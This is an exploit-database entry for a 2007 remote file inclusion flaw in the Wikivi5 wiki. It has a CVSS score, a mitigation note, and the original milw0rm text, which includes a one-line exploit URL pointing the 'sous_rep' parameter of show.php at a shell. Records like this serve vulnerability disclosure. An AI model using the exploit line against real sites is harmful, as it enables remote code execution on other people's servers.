header-logo
Suggest Exploit
vendor:
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Wikivi5 Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include a remote file in the application's code, which can lead to arbitrary code execution.

Mitigation:

The vendor should update the application to properly sanitize user input and avoid using user-supplied input in file inclusion functions.
Source

Exploit-DB raw data:

# Wikivi5 Remote File Inclusion Vulnerability
# D.Script: http://wiki.vi5.org/fichiers/Wikivi5.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/handlers/page/show.php?sous_rep=Shell
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-06]